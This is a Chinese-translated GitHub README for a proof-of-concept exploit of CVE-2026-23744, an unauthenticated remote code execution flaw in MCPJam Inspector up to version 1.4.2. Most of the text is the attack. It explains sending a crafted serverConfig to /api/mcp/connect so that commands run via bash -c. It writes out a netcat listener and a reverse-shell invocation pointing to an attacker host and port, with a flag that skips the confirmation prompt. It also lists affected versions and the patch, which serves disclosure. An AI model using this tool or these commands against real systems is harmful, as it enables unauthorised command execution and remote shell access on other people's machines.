ozcanpng/CVE-2026-23744

GitHub: ozcanpng/CVE-2026-23744

针对 MCPJam Inspector 未授权 RCE 漏洞(CVE-2026-23744)的 PoC 利用工具,支持命令验证与反弹 Shell。

Stars: 0 | Forks: 0

# CVE-2026-23744 — MCPJam Inspector 未授权 RCE CVE-2026-23744 的未授权远程代码执行 PoC。MCPJam Inspector `1.4.2` 及更早版本通过 `/api/mcp/connect` 暴露了相关功能,可以在无需身份验证的情况下启动由攻击者控制的 MCP 服务器命令。 ## 功能说明 ``` HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution ``` 1. 构建精心构造的 MCP `serverConfig` 负载。 2. 将目标对准未授权的 `/api/mcp/connect` 端点。 3. 通过 `bash -c` 启动配置的命令。 4. 支持安全的命令验证和 reverse shell 负载。 5. 提供空运行/调试模式,以便在发送流量前检查负载。 ## 截图 ### Reverse shell 设置 ![Reverse shell 设置](https://static.pigsec.cn/wp-content/uploads/repos/cas/ca/ca60a37b0ae1a6943f2f8403345aebdc63133714a8f0634feeb60d7d45fd2ee2.png) ### MCPJam connect 负载 ![MCPJam connect 负载](https://static.pigsec.cn/wp-content/uploads/repos/cas/39/398fbe133f1a8fd932040c9111dcd1df4b36a0bbf0b8b6f448ecf7acfc1f2a9f.png) ### 接收到的 Shell ![接收到的 Shell](https://static.pigsec.cn/wp-content/uploads/repos/cas/4d/4d4062984af29d92b5a8fd5af6a220913f4d89c42468aab6fa30fb49460e8178.png) ## 安装说明 ``` git clone https://github.com/ozcanpng/CVE-2026-23744.git cd CVE-2026-23744 pip install -r requirements.txt ``` ## 用法 ### 安全命令验证 ``` python3 CVE-2026-23744.py \ --url http://127.0.0.1:3000 \ --cmd 'id' ``` ### 反向 shell 首先启动一个监听器: ``` rlwrap nc -lvnp 4444 ``` 然后运行: ``` python3 CVE-2026-23744.py \ --url http://127.0.0.1:3000 \ --reverse-shell \ --lhost 10.10.16.53 \ --lport 4444 ``` 实用选项: ``` --cmd COMMAND Command to execute (default: id) --server-id VALUE serverId value in the crafted MCP config (default: pwn) --dry-run Build payload flow without sending the HTTP request --debug Print endpoint and JSON payload --verify-tls Verify HTTPS certificates --timeout SECONDS HTTP timeout in seconds (default: 8) --yes Skip reverse-shell confirmation prompt ``` ## 受影响情况 | 产品 | 受影响版本 | 所需权限 | 影响 | |---------|------------------|-----------------|--------| | MCPJam Inspector | `<= 1.4.2` | 无 | 以 MCPJam Inspector 进程用户身份执行远程命令 | 当 MCPJam Inspector 监听 `0.0.0.0` 时,该漏洞尤为容易暴露,允许远程主机访问该开发服务。 ## 注意事项 - 该 PoC 向 `/api/mcp/connect` 发送 JSON 负载。 - 命令通过 `serverConfig.command` 和 `serverConfig.args` 传递。 - 在尝试 reverse shell 之前,建议使用 `--cmd` 进行安全验证。 - 使用 `--dry-run --debug` 检查生成的请求,而无需触及目标。 - 根据 NVD 的信息,版本 `1.4.3` 包含了上游补丁。 ## 参考文献 - [NVD — CVE-2026-23744](https://nvd.nist.gov/vuln/detail/CVE-2026-23744) - [GitHub 安全公告 — GHSA-232v-j27c-5pp6](https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6) - [补丁提交](https://github.com/MCPJam/inspector/commit/e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a) - [MCPJam Inspector](https://github.com/MCPJam/inspector) ## PoC 作者 ozcanpng — [github.com/ozcanpng](https://github.com/ozcanpng) — [ozcanpng.dev](https://ozcanpng.dev)
标签:Homebrew安装, 逆向工具